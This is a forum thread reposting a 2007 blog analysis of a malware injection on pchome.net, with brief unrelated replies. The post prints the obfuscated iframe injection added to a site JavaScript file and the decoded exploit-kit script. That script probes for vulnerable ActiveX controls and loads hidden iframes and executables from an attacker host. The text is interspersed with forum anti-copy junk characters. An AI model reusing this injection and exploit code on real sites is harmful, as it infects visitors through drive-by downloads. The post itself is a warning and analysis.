下沙论坛

 找回密码
 注册论坛(EC通行证)

用新浪微博连接

一步搞定

QQ登录

QQ登录

下沙大学生网QQ群8(千人群)
群号:6490324 ,验证:下沙大学生网。
用手机发布本地信息严禁群发,各种宣传贴请发表在下沙信息版块有问必答,欢迎提问 提升会员等级,助你宣传
新会员必读 大学生的论坛下沙新生必读下沙币获得方法及使用
查看: 3677|回复: 3
打印 上一主题 下一主题

小心!Pchome.net出现大面积挂马现象,敬请会员们注意安全!

[复制链接]

该用户从未签到

跳转到指定楼层
1
发表于 2007-12-29 15:56:27 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
截至2007-12-28 18:17 仍修复) E) @! R* A2 F1 H

8 b+ {% M; q6 {* P" M! f- [3 N8 s: G. ?
##I#KE+X#D=$I#KE+XDI=KE+=X++D$IK#E#X+DI$KE+X=D=IK$E+$X=$D#I+$KEX$#DI+K#EXD=IKE+X#D#=I==K+E==XD+I#K$E$#X$D##I
+ ^2 w8 n8 l) R7 A
; t! |8 F2 i3 u- f6 I3 k' i6 p
从论坛看到的消息说pchome的某页面被挂马了,于是上去找,http://article.pchome.net/content-502393-7.html#topView
; Q( P) C( @& S9 [2 l# h+ d& _/ F# @" Q) w4 d* l* p% E
挂得比较隐蔽,http://btn.pchome.net/flash.js的中间被加入了如下代码:1 n! }' D1 J# E/ `
) C9 g( \+ E3 i, ?1 a6 R
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]('\x3c\x69\x66\x72\x61\x6d\x65 \x68\x65\x69\x67\x68\x74\x3d\x30 \x77\x69\x64\x74\x68\x3d\x30 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x35\x39\x2e\x76\x63\x2f\x70\x61\x67\x65\x2f\x61\x64\x64\x5f\x36\x34\x34\x34\x35\x35\x2e\x68\x74\x6d\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');. h# O. o. @/ P6 k

- M8 l/ V( b5 H6 u3 R也就是这个了:: [3 f, E/ U9 @! U  Q& n9 Z

! u* f0 y4 P5 S! J2 Xwindow["document"]["writeln"]('<iframe height=0 width=0 src="http://www.59.vc/page/add_644455.htm"></iframe>');$ H3 {$ ?8 H  s; x1 ?  ?: n
7 B6 k$ M0 T" p  D+ c
但只有这个js还不会使得那个iframe生效,使得他生效的是调用这个js显示flash 的代码:5 ^, Y% y  A/ p' G6 ^- F

6 v0 ]" d/ P0 d1 q% t- z0 ^<script language="javascript" type="text/javascript">0 }9 ^# @, _; t5 Y1 h: t
writeflashhtml("_swf=http://btn.pchome.net/pchome/20071217/300_250.swf", "_width=300", "_height=250" ,"_wmode=opaque");
; s: {8 y, \* v6 ]2 L8 j0 }</script>
+ s$ Z! D1 [: D4 W- c

9 b3 G+ K& j* W' {8 ?有了这个,iframe就生效了;经过一番调用和解密后得:4 Z0 Y: s) o" N. @4 D$ h  }6 \8 V

6 M" v& {  p6 s: F8 j% X  Lfunction bIsKIS(){for(i=2;i<26;i++){var kis6=new Image();var kis7=new Image();var root=String.fromCharCode(65+i);kis6.src="mkMSITStore:"+root+":\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 6.0\\Doc\\context.chm::/images/help.gif";kis7.src="mkMSITStore:"+root+":\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 7.0\\Doc\\context.chm::/images/help.gif";if(kis6.height==41||kis7.height==41)return true}return false}var Then=new Date();aaxxx="xxxyyyyfassssfsadfasdf";Then.setTime(Then.getTime()+24*60*60*1000);var aaffdasfascookie=new String(document.cookie);var cookieHeader="Cookie1=";aaxxx="xxxyyyyfassssfsadfasdf";if(!bIsKIS()&&aaffdasfascookie.indexOf(cookieHeader)==-1){aaxxx="xxxyyyyfassssfsadfasdf";document.cookie="Cookie1=POPWINDOS;expires="+Then.toGMTString();aaxxx="xxxyyyyfassssfsadfasdf";try{if(new ActiveXObject("IERPCtl.IERPCtl.1"))document.write('<iframe style=display:none src="http://w18.vg/real.gif"></iframe>')}catch(e){}try{if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)document.write('<iframe style=display:none src="http://w18.vg/ms.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("DPClient.Vod"))document.write('<iframe style=display:none src="http://w18.vg/xl.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("GLCHAT.GLChatCtrl.1"))document.write('<iframe style=display:none src="http://w18.vg/lz.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("MPS.StormPlayer.1"))document.write('<iframe style=display:none src="http://w18.vg/bf.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("BaiduBar.Tool.1"))document.write('<iframe style=display:none src="http://w18.vg/baidu.gif"></iframe>')}catch(e){}}$ q3 `$ a% X/ ]0 f; h9 Z2 G. K

4 T6 N4 ]7 G& W4 M6 t2 P" ~) bK##E+XD++IK+EX=#D$IKEXD+$I#KEXDI+K$EX$DI$$KE##X#DI=K+E$X=$DI#K+#EX=DIK=E$=XDIK=$EX=DIK$E$#X=D=I##KE#=X+$D+8 L7 H( k9 Y0 S1 P

1 {& t; o  }' h# r5 w5 C1 k
# B- \( C9 S+ p- W
挑了几个解密得:http://w18.vg/s.exe+ d7 F& B- r% ~& |8 U0 g
, Z: c$ L8 ~5 K! T
从这个文件里面得到另外一个链接:http://w18.vg/ss.exe, |$ Y1 w! B6 X2 I+ ?3 C9 i8 \: p

- }# g6 |9 I: j4 a/ r2 R有点面熟的东西……& |  T; v2 y& M' L/ I: j) b

6 H- C$ H0 f/ F5 q9 Q6 d8 _& `1 u##K=E#X+D=IKE$XD$=I==K+#EXD=#I=KE$+XDI#K$=EX=D=#IK+E=X$D==I=#K=E##X$D$+IK=#EXD+IK$EX$=D+I+K#E$XD+IKEX#D
6 X" O$ s" O8 m+ V6 `+ i8 b
5 y. m- B9 ?" V' K1 Y+ G从上面可以知道,出问题的是那个flash.js,因此所有使用这个js来放flash的页面全都有毒了!我随便找了几个页面,发现都是有毒的,这回可是大面积的被挂咯,同志们自己小心了。
. N& |1 ]1 W- R7 V0 X, p' t4 I( i& ]! G+ k7 _: w
K$EX=+DI#$KE+X#DIK$EXD$I=KE$XD+#I+KEXD=I+KE=X$D=I=KEXD#=IK==E$X=D=I#+KEXD=IK#EX#DI=K=E=X=#DIKEXDI#KE2 `% Y% Y7 y8 W% b, f6 w1 G& B

8 X2 D- d0 c- K. O转载请保留声明!(http://hi.baidu.com/dikex/blog/item/36300afa339a8c889e5146f5.html# i: t, X! p" N- @+ r

* C0 x4 f7 d% Q4 m5 k

; E( Z4 _3 I3 ^2 ?! v0 i% ]& J作者dikex(六翼刺猬),原文链接:http://hi.baidu.com/dikex/blog/item/92f804c70762ead8d10060ff.html
分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
收藏收藏 分享分享 顶 踩 转发到微博
  • TA的每日心情
    奋斗
    前天 10:28
  • 签到天数: 2370 天

    [LV.Master]伴坛终老

    2
    发表于 2007-12-29 21:36:43 | 只看该作者
    多谢。it类一般只去pconline和zol
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    3
     楼主| 发表于 2007-12-29 21:57:51 | 只看该作者
    我是四处流窜的,IT信息看CB比较多。
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    前天 10:28
  • 签到天数: 2370 天

    [LV.Master]伴坛终老

    4
    发表于 2007-12-30 01:41:55 | 只看该作者
    对了。忘记说cnbeta最常去了
    回复 支持 反对

    使用道具 举报

    本版积分规则

    关闭

    下沙大学生网推荐上一条 /1 下一条

    快速回复 返回顶部 返回列表